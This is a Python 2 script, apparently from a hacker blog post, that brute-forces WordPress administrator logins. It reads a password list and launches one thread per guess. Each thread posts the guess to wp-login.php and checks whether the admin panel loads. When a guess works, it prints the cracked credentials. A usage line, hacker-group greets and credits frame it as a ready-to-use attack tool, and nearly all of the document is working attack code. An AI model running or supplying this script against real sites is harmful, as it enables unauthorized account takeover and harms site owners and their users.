code brute-force wordpress

#!/usr/bin/python 
# Video: http://youtu.be/mURnM-Yp72g 
# Coded By: xSecurity

import urllib, urllib2, os, sys, requests as xsec, re
from time import sleep
from threading import Thread
def cls():
    linux = 'clear'
    windows = 'cls'
    os.system([linux,windows][os.name == 'nt']) 
cls()
print '''
       __                      _ _         
__  __/ _\ ___  ___ _   _ _ __(_) |_ _   _ 
\ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
 >  < _\ \  __/ (__| |_| | |  | | |_| |_| |
/_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
                                     |___/WordPress Brute Muliththreading :)
#Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
#Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin 
Special For My Lov3r Cyber-Crystal
#Usage: Python wp.py http://target.com/ admin pass.txt
#Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''

xsec = xsec.session()
def brute(target,usr,pwd):
    get = xsec.get(target+'/wp-admin/')
    post = {}
    post["log"] = usr
    post["pwd"] = pwd
    post["wp-submit"] = "Log+in"
    post["redirect_to"] = target
    post["testcookie"] = "1"
    get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
    get3 = xsec.get(target+'/wp-admin')
    if '<li id="wp-admin-bar-logout">' in get3.text:
        print '[+] Cracked Username: '+usr+' & Password: '+pwd
        os._exit(1)
    else:
        print '[~] Trying ...: '+pwd

if len(sys.argv) >= 3:
    target = sys.argv[1]
    usr = sys.argv[2]
    lst = open(sys.argv[3]).read().split("\n") 
    print '[*]Target: '+target
    print '[*]LIST:',len(lst)
    print '[*]Username: '+usr
    thrdlst = []
    for pwd in lst:
        t = Thread(target=brute, args=(target,usr,pwd))
        t.start()
        thrdlst.append(t)
        sleep(0.009)
    for b in thrdlst:
        b.join()
else:
    print '[>]There Somthing Missing Check ARGVS :)'

No comments: